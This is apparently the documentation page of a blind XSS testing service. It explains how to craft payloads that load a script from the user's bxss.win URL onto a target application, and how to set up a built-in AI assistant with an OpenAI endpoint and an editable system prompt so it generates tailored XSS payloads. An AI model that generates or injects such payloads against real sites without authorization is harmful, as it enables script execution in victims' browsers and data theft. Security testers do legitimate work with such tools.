Skip to main content

Crafting Payload

Things to keep in mind:

  1. Your payload must be loaded from https://bxss.win/{username}
  2. You must craft the payload in a way that the script from the URL gets executed on the target application.

Using Predefined Payloads

We have predefined payloads for common blind xss vectors. You can find them in the Payloads section of your dashboard.

Using AI to craft your payloads

We have an AI assistant feature that can help you craft your payloads. You can find it in the same Payloads section of your dashboard in the AI Assistant tab.

Configuring AI Assistant

  1. Go to the Payloads section of your dashboard.
  2. Click on the AI Assistant tab.
  3. Click on the Configure AI button on the top right.
  4. Put in the API Endpoint URL, API Key, and Model Name. The default API Endpoint URL is https://api.openai.com/v1/chat/completions and the default Model Name is gpt-4.1.
  5. You may also add additional HTTP header if your API requires it.
  6. You can also change the system prompt to guide the AI on what to do by clicking on Advanced: Edit System Prompt link.
  7. Click on the Save Configuration button.

Note: The AI Payload assistant configuration is stored in your browser's local storage, and all API requests are sent from your browser. So our servers don't have any access to your API keys or any sensitive data.

Using AI Assistant

In the prompt box, you can describe the context or target (e.g., "I need the payload with img tag" or "I need the payload that doesn't use script tag"). The AI will generate a tailored blind XSS payload using your bxss.win URL (https://bxss.win/{username}).